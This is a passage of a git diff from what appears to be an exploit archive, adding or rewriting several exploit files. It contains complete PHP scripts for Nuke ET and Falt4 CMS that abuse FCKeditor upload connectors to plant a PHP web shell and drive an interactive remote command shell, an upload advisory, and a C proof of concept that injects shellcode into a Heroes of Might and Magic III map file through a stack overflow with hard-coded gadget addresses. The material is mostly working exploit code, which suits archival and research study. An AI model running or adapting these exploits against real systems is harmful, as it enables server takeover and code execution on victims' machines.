+		$sock = fsockopen($host, 80);
+	}
+	fputs($sock, $packet);
+	while (!feof($sock)) $resp .= fread($sock, 1024);
+	fclose($sock);
+	return $resp;
+}
+
+function connector_response($html)
+{
+	return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
+}
+
+print "\n+------------------------------------------------------------------+";
+print "\n| Nuke ET <= 3.4 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
+print "\n+------------------------------------------------------------------+\n";
+
+if ($argc < 3)
+{
+	print "\nUsage......: php $argv[0] host path";
+	print "\nExample....: php $argv[0] localhost /";
+	print "\nExample....: php $argv[0] localhost /nukeet/\n";
+	die();
+}
+
+$host = $argv[1];
+$path = ereg_replace("(/){2,}", "/", $argv[2]);
+
+$filename  = md5(time()).".php";
+$connector = "FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php";
+
+$payload  = "--o0oOo0o\r\n";
+$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
+$payload .= "Content-Type: application/zip\r\n\r\n";
+$payload .= "PK\003\004<?php error_reporting(0);print(\"_code_\\n\");passthru(base64_decode(\$_SERVER[HTTP_CMD])); ?>\n";
+$payload .= "--o0oOo0o--\r\n";
+
+$packet	 = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
+$packet	.= "Host: {$host}\r\n";
+$packet .= "Content-Length: ".strlen($payload)."\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
+$packet .= "Connection: close\r\n\r\n";
+$packet .= $payload;
+
+if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
+else print "\n[-] Shell uploaded to {$filename}...starting it!\n";
+
+$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root 
+
+$packet  = "GET {$path}{$filename} HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Cmd: %s\r\n";
+$packet .= "Connection: close\r\n\r\n";
+
+while(1)
+{
+	print "\nnukeet-shell# ";
+	$cmd = trim(fgets(STDIN));
+	if ($cmd != "exit")
+	{
+		$response = http_send($host, sprintf($packet, base64_encode($cmd)));
+		preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
+	}
+	else break;
+}
+
+?>
+
+# milw0rm.com [2008-10-18]
diff --git a/platforms/php/webapps/7158.txt b/platforms/php/webapps/7158.txt
index 7303d2770..23cc6fd42 100755
--- a/platforms/php/webapps/7158.txt
+++ b/platforms/php/webapps/7158.txt
@@ -1,51 +1,51 @@
-########################################################################
-#
-#                        Yellow Flood Organization
-#
-# Alex article-engine V1.3.0 (fckeditor) Arbitrary File Upload
-#
-# Source: http://www.alexscriptengine.de/blog/category/article-engine/
-#
-# Download: http://www.alexscriptengine.de/blog/asedownloads/article-engine/
-#
-# Discover by: Batter
-#
-########################################################################
-
-
-
-####################
-- Vulnerability:
-####################
-
-/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?
-
-Command=FileUpload&Type=File&CurrentFolder=/
-
-####################
-- Exploit:
-####################
-
-http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html
-
-####################
-- how To use:
-####################
-
-http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*
-
-####################
-- Solution:
-####################
-
-Restrict and grant only trusted users access to the resources.
-
-####################
-- Greets :
-####################
-
-THE.HACKER.ONE , Str0ke
-
-####################
-
-# milw0rm.com [2008-11-19]
+########################################################################
+#
+#                        Yellow Flood Organization
+#
+# Alex article-engine V1.3.0 (fckeditor) Arbitrary File Upload
+#
+# Source: http://www.alexscriptengine.de/blog/category/article-engine/
+#
+# Download: http://www.alexscriptengine.de/blog/asedownloads/article-engine/
+#
+# Discover by: Batter
+#
+########################################################################
+
+
+
+####################
+- Vulnerability:
+####################
+
+/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?
+
+Command=FileUpload&Type=File&CurrentFolder=/
+
+####################
+- Exploit:
+####################
+
+http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html
+
+####################
+- how To use:
+####################
+
+http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*
+
+####################
+- Solution:
+####################
+
+Restrict and grant only trusted users access to the resources.
+
+####################
+- Greets :
+####################
+
+THE.HACKER.ONE , Str0ke
+
+####################
+
+# milw0rm.com [2008-11-19]
diff --git a/platforms/php/webapps/8060.php b/platforms/php/webapps/8060.php
index d15407cb1..da245c619 100755
--- a/platforms/php/webapps/8060.php
+++ b/platforms/php/webapps/8060.php
@@ -1,95 +1,95 @@
-################################################################
-#
-# Falt4 CMS (fckeditor) Arbitrary File Upload Exploit
-#
-# Bug Discovered By : Sp3shial
-#
-# Sp3shial@ymail.com
-#
-# Persian Boys Hacking Team From A Land With A History-Long Background
-#
-# Download CMS : http://downloads.sourceforge.net/falt4/falt4extreme.zip?modtime=1196845455&big_mirror=0
-#
-###############################################################
-
-error_reporting(0);
-set_time_limit(0);
-ini_set("default_socket_timeout", 5);
-
-define(STDIN, fopen("php://stdin", "r"));
-
-function http_send($host, $packet)
-{
-	$sock = fsockopen($host, 80);
-	while (!$sock)
-	{
-		print "\n[-] No response from {$host}:80 Trying again...";
-		$sock = fsockopen($host, 80);
-	}
-	fputs($sock, $packet);
-	while (!feof($sock)) $resp .= fread($sock, 1024);
-	fclose($sock);
-	return $resp;
-}
-
-function connector_response($html)
-{
-	return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
-}
-
-print "\n+------------------------------------------------------------------+";
-print "\n| Falt4 CMS (fckeditor) Arbitrary File Upload Exploit by Sp3shial  |";
-print "\n+------------------------------------------------------------------+\n";
-
-if ($argc < 3)
-{
-	print "\nUsage......: php $argv[0] host path";
-	print "\nExample....: php $argv[0] localhost /";
-	print "\nExample....: php $argv[0] localhost /Falt4/\n";
-	die();
-}
-
-$host = $argv[1];
-$path = ereg_replace("(/){2,}", "/", $argv[2]);
-
-$filename  = md5(time()).".php";
-$connector = "modules/newsletter/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php";
-
-$payload  = "--o0oOo0o\r\n";
-$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
-$payload .= "Content-Type: application/zip\r\n\r\n";
-$payload .= "PK\003\004<?php error_reporting(0);print(\"_code_\\n\");passthru(base64_decode(\$_SERVER[HTTP_CMD])); ?>\n";
-$payload .= "--o0oOo0o--\r\n";
-
-$packet	 = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
-$packet	.= "Host: {$host}\r\n";
-$packet .= "Content-Length: ".strlen($payload)."\r\n";
-$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
-$packet .= "Connection: close\r\n\r\n";
-$packet .= $payload;
-
-if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
-else print "\n[-] Shell uploaded to {$filename}...starting it!\n";
-
-$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root 
-
-$packet  = "GET {$path}{$filename} HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
-$packet .= "Cmd: %s\r\n";
-$packet .= "Connection: close\r\n\r\n";
-
-while(1)
-{
-	print "\nFalt4-shell# ";
-	$cmd = trim(fgets(STDIN));
-	if ($cmd != "exit")
-	{
-		$response = http_send($host, sprintf($packet, base64_encode($cmd)));
-		preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
-	}
-	else break;
-}
-
-?>
-
-# milw0rm.com [2009-02-16]
+################################################################
+#
+# Falt4 CMS (fckeditor) Arbitrary File Upload Exploit
+#
+# Bug Discovered By : Sp3shial
+#
+# Sp3shial@ymail.com
+#
+# Persian Boys Hacking Team From A Land With A History-Long Background
+#
+# Download CMS : http://downloads.sourceforge.net/falt4/falt4extreme.zip?modtime=1196845455&big_mirror=0
+#
+###############################################################
+
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 5);
+
+define(STDIN, fopen("php://stdin", "r"));
+
+function http_send($host, $packet)
+{
+	$sock = fsockopen($host, 80);
+	while (!$sock)
+	{
+		print "\n[-] No response from {$host}:80 Trying again...";
+		$sock = fsockopen($host, 80);
+	}
+	fputs($sock, $packet);
+	while (!feof($sock)) $resp .= fread($sock, 1024);
+	fclose($sock);
+	return $resp;
+}
+
+function connector_response($html)
+{
+	return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
+}
+
+print "\n+------------------------------------------------------------------+";
+print "\n| Falt4 CMS (fckeditor) Arbitrary File Upload Exploit by Sp3shial  |";
+print "\n+------------------------------------------------------------------+\n";
+
+if ($argc < 3)
+{
+	print "\nUsage......: php $argv[0] host path";
+	print "\nExample....: php $argv[0] localhost /";
+	print "\nExample....: php $argv[0] localhost /Falt4/\n";
+	die();
+}
+
+$host = $argv[1];
+$path = ereg_replace("(/){2,}", "/", $argv[2]);
+
+$filename  = md5(time()).".php";
+$connector = "modules/newsletter/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php";
+
+$payload  = "--o0oOo0o\r\n";
+$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
+$payload .= "Content-Type: application/zip\r\n\r\n";
+$payload .= "PK\003\004<?php error_reporting(0);print(\"_code_\\n\");passthru(base64_decode(\$_SERVER[HTTP_CMD])); ?>\n";
+$payload .= "--o0oOo0o--\r\n";
+
+$packet	 = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
+$packet	.= "Host: {$host}\r\n";
+$packet .= "Content-Length: ".strlen($payload)."\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
+$packet .= "Connection: close\r\n\r\n";
+$packet .= $payload;
+
+if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
+else print "\n[-] Shell uploaded to {$filename}...starting it!\n";
+
+$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root 
+
+$packet  = "GET {$path}{$filename} HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Cmd: %s\r\n";
+$packet .= "Connection: close\r\n\r\n";
+
+while(1)
+{
+	print "\nFalt4-shell# ";
+	$cmd = trim(fgets(STDIN));
+	if ($cmd != "exit")
+	{
+		$response = http_send($host, sprintf($packet, base64_encode($cmd)));
+		preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
+	}
+	else break;
+}
+
+?>
+
+# milw0rm.com [2009-02-16]
diff --git a/platforms/win64/local/37064.py b/platforms/win64/local/37064.py
index a3dbbb29c..c63f52069 100755
--- a/platforms/win64/local/37064.py
+++ b/platforms/win64/local/37064.py
@@ -6,6 +6,8 @@
 # Target OS Windows 8.0 - 8.1 x64
 # Author: Matteo Memelli ryujin <at> offensive-security.com
 
+# EDB Note: Swapping the shellcode for a bind or reverse shell will BSOD the machine.
+
 from ctypes import *
 from ctypes.wintypes import *
 import struct, sys, os, time, threading, signal
diff --git a/platforms/windows/local/37716.c b/platforms/windows/local/37716.c
new file mode 100755
index 000000000..2a57f5712
--- /dev/null
+++ b/platforms/windows/local/37716.c
@@ -0,0 +1,272 @@
+/*
+# Exploit Title : Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution
+# Date : 2015-07-29
+# Exploit Author : John AAkerblom, Pierre Lindblad
+# Website: http://h3minternals.net
+# Vendor Homepage : 3do.com (defunct), https://sites.google.com/site/heroes3hd/
+# Version : 4.0.0.0 AND HoMM 3 HD 3.808 build 9
+# Tested on : Windows XP, Windows 8.1
+# Category: exploits
+
+# Description:
+  This PoC embeds an exploit into an uncompressed map file (.h3m) for Heroes 
+  of Might and Magic III. Once the map is started in-game, a buffer overflow 
+  occuring when loading object sprite names leads to shellcode execution.
+  
+  Only basic arbitrary code execution is covered in this PoC but is possible to 
+  craft an exploit that lets the game continue normally after the shellcode has
+  been executed. Using extensive knowledge of the .h3m format, it is even 
+  possible to create a map file that loads like normal in the game's map editor
+  (which lacks the vulnerability) but stealthily executes shellcode when opened 
+  in-game.
+*/
+#include <string.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+/* Calc payload: https://code.google.com/p/win-exec-calc-shellcode/
+   0xEBFE added at end. Note that a NULL-less payload is not actually needed
+
+Copyright (c) 2009-2014 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
+and Peter Ferrie <peter.ferrie@gmail.com>
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+    * Redistributions of source code must retain the above copyright
+      notice, this list of conditions and the following disclaimer.
+    * Redistributions in binary form must reproduce the above copyright
+      notice, this list of conditions and the following disclaimer in the
+      documentation and/or other materials provided with the distribution.
+    * Neither the name of the copyright holder nor the names of the
+      contributors may be used to endorse or promote products derived from
+      this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
+INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
+AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
+DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
+THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */
+static const uint8_t CALC_PAYLOAD[] = {
+    0x31, 0xD2, 0x52, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x52,
+    0x51, 0x64, 0x8B, 0x72, 0x30, 0x8B, 0x76, 0x0C, 0x8B, 0x76, 0x0C,
+    0xAD, 0x8B, 0x30, 0x8B, 0x7E, 0x18, 0x8B, 0x5F, 0x3C, 0x8B, 0x5C,
+    0x1F, 0x78, 0x8B, 0x74, 0x1F, 0x20, 0x01, 0xFE, 0x8B, 0x54, 0x1F,
+    0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x42, 0x42, 0xAD, 0x81, 0x3C, 0x07,
+    0x57, 0x69, 0x6E, 0x45, 0x75, 0xF0, 0x8B, 0x74, 0x1F, 0x1C, 0x01,
+    0xFE, 0x03, 0x3C, 0xAE, 0xFF, 0xD7, 0xEB, 0xFE
+};
+
+/*
+* The memmem() function finds the start of the first occurrence of the
+* substring 'needle' of length 'nlen' in the memory area 'haystack' of
+* length 'hlen'.
+*
+* The return value is a pointer to the beginning of the sub-string, or
+* NULL if the substring is not found.
+*
+* Original author: caf, http://stackoverflow.com/a/2188951
+*/
+static uint8_t *_memmem(uint8_t *haystack, size_t hlen, uint8_t *needle, size_t nlen)
+{
+    uint8_t needle_first;
+    uint8_t *p = haystack;
+    size_t plen = hlen;
+
+    if (!nlen)
+        return NULL;
+
+    needle_first = *(uint8_t  *)needle;
+
+    while (plen >= nlen && (p = memchr(p, needle_first, plen - nlen + 1)))
+    {
+        if (!memcmp(p, needle, nlen))
+            return p;
+
+        p++;
+        plen = hlen - (p - haystack);
+    }
+
+    return NULL;
+}
+
+#ifdef _MSC_VER
+    #pragma warning(disable:4996) // M$ fopen so unsafe
+#endif
+
+#pragma pack(push, 1)
+// exploit struct
+// .h3m files contain an array of object attributes - OA - in which each
+// entry starts with a string length and then a string for an object sprite.
+// This exploit overflows the stack with a malicious sprite name.
+struct exploit_oa_t
+{
+    uint32_t size; // size of the rest of this struct, including shellcode
+
+    // The rest of the struct is the sprite name for the OA, <size> bytes of 
+    // which an CALL ESP-gadget address is placed so that it overwrites the
+    // return address, when ESP is called shellcode2 will be executed. An 
+    // additional 2 "anticrash" gadgets are needed so the game does not crash 
+    // before returning to the CALL ESP-gadget.
+
+    uint8_t nullbyte; // Must be 0x00, terminating sprite name
+    uint8_t overwritten[6]; // Overwritten by game
+    uint8_t shellcode1[121]; // Mostly not used, some is overwritten
+    uint32_t call_esp_gadget; // Address of CALL [ESP], for saved eip on stack
+
+    // anticrash_gadget1, needs to pass the following code down to final JMP:
+    //
+    // MOV EAX, DWORD PTR DS : [ESI + 4] ; [anticrash_gadget1 + 4]
+    // XOR EBX, EBX
+    // CMP EAX, EBX
+    // JE SHORT <crash spot> ; JMP to crash if EAX is 0
+    // MOV CL, BYTE PTR DS : [EAX - 1]
+    // CMP CL, BL
+    // JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0
+    // CMP CL, 0FF
+    // JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0xFF
+    // CPU Disasm
+    // CMP EDI, EBX
+    // JNE <good spot> ; JMP to good spot. Always occurs if we get this far
+    uint32_t anticrash_gadget1;
+
+    // anticrash_gadget2, needs to return out of the following call (tricky):
+    //
+    // MOV EAX, DWORD PTR DS : [ECX] ; [anticrash_gadget2]
+    // CALL DWORD PTR DS : [EAX + 4] ; [[anticrash_gadget2] + 4]
+    uint32_t anticrash_gadget2;
+
+    // Here at 144 bytes into this struct comes the shellcode that will be 
+    // executed. For the game to survive, it is wise to use this only for a 
+    // short jmp as doing so means only 2 values have to be restored on the 
+    // stack. Namely: original return address and format value of the h3m.
+    // This PoC simply puts shellcode here, meaning the game cannot continue
+    // after shellcode execution.
+    uint8_t shellcode2[];
+};
+
+struct offsets_t
+{
+    uint32_t call_esp_gadget;
+    uint32_t anticrash_gadget1;
+    uint32_t anticrash_gadget2;
+};
+#pragma pack(pop)
+
+static const struct offsets_t * const TARGET_OFFSETS[] = { 
+    (struct offsets_t *)"\x87\xFF\x4E\x00\xD4\x97\x44\x00\x30\x64\x6A\x00",
+    (struct offsets_t *)"\x0F\x0C\x58\x00\x48\x6A\x45\x00\x30\x68\x6A\x00"
+};
+#define TARGET_DESCS "    1: H3 Complete 4.0.0.0  [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]\n" \
+                     "    2: HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]"
+#define MAX_TARGET 2
+
+// Name of a sprite present in all maps, this is overwritten with exploit
+#define NEEDLE "AVWmrnd0.def"
+
+int pack_h3m(FILE *h3m_f, const struct offsets_t * const ofs, const uint8_t *payload, long payload_size)
+{
+    uint8_t *buf = NULL;
+    uint8_t *p = NULL;
+    long h3m_size = 0;
+    long bytes = 0;
+    struct exploit_oa_t *exp = NULL;
+
+    // Read entire h3m file into memory
+    fseek(h3m_f, 0, SEEK_END);
+    h3m_size = ftell(h3m_f);
+    rewind(h3m_f);
+    buf = malloc(h3m_size);
+    if (buf == NULL) {
+        puts("[!] Failed to allocate memory");
+        return 1;
+    }
+    bytes = fread(buf, sizeof(uint8_t), h3m_size, h3m_f);
+    if (bytes != h3m_size) {
+        free(buf);
+        puts("[!] Failed to read all bytes");
+        return 1;
+    }
+
+    // Find game object array in .h3m, where we will overwrite the first entry
+    p = _memmem(buf, h3m_size, (uint8_t *)NEEDLE, sizeof(NEEDLE) - 1);
+    if (p == NULL) {
+        puts("[!] Failed to find needle \"" NEEDLE "\" in file. Make sure it is an uncompressed .h3m");
+        free(buf);
+        return 1;
+    }
+    
+    // Move back 4 bytes from sprite name, pointing to the size of the sprite name
+    p -= 4;
+
+    // Overwrite the first game object with exploit
+    exp = (struct exploit_oa_t *)p;
+    exp->size = sizeof(*exp) - sizeof(exp->size) + payload_size;
+    exp->nullbyte = 0;
+    exp->call_esp_gadget = ofs->call_esp_gadget;
+    exp->anticrash_gadget1 = ofs->anticrash_gadget1;
+    exp->anticrash_gadget2 = ofs->anticrash_gadget2;
+    memcpy(exp->shellcode2, payload, payload_size);
+
+    // Write entire file from memory and cleanup
+    rewind(h3m_f);
+    bytes = fwrite(buf, sizeof(uint8_t), h3m_size, h3m_f);
+    if (bytes != h3m_size) {
+        free(buf);
+        puts("[!] Failed to write all bytes");
+        return 1;
+    }
+    free(buf);
+
+    return 0;
+}
+
+static void _print_usage(void)
+{
+    puts("Usage: h3mpacker <uncompressed h3m filename> <target #>");
+    puts("Available targets:");
+    puts(TARGET_DESCS);
+    puts("Examples:");
+    puts("    h3mpacker Arrogance.h3m 1");
+    puts("    h3mpacker Deluge.h3m 2");
+}
+
+int main(int argc, char **argv)
+{
+    FILE *h3m_f = NULL;
+    int ret = 0;
+    int target;
+    
+    if (argc != 3) {
+        _print_usage();
+        return 1;
+    }
+
+    h3m_f = fopen(argv[1], "rb+");
+    target = strtoul(argv[2], NULL, 0);
+
+    if (h3m_f == NULL || target < 1 || target > MAX_TARGET) {
+        if (h3m_f != NULL)
+            fclose(h3m_f);
+        _print_usage();
+        return 1;
+    }
+
+    ret = pack_h3m(h3m_f, TARGET_OFFSETS[target-1], CALC_PAYLOAD, sizeof(CALC_PAYLOAD));
+
+    fclose(h3m_f);
+
+    if (ret != 0)
+        return ret;
+    
+    printf("[+] Payload embedded into h3m file %s\n", argv[1]);
+
+    return 0;
+}
+